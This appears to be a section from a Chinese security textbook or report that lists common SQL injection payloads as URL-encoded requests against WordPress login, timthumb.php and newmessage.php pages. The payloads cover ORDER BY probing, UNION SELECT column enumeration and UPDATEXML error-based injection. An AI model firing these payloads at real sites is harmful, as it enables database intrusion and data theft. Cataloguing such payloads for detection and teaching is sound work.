4.2.2 常见SQL注入攻击载荷

常见SQL注入攻击载荷如下:


/wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-conten
t%2Fuploads%2F2017%2F03%2F12.png&w=-9611%22%20UNION%20ALL%20SELECT%208303%2C%208
303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303--%20&h=210&zc=1
/newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x
3a6e676f3a%2C%28SELECT%20%28CASE%20WHEN%20%283114%3D3114%29%20THEN%201%20ELSE%20
0%20END%29%29%2C0x3a7262793a%29%2C6430%29%20%20AND%20%22Enli%22%3D%22Enli
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELEC
T%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2
C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-conten
t%2Fuploads%2F2017%2F03%2F12.png&w=-2372%22%20UNION%20ALL%20SELECT%202985%2C%202
985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202
985%2C%202985--%20&h=210&zc=1
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELEC
T%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2
C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23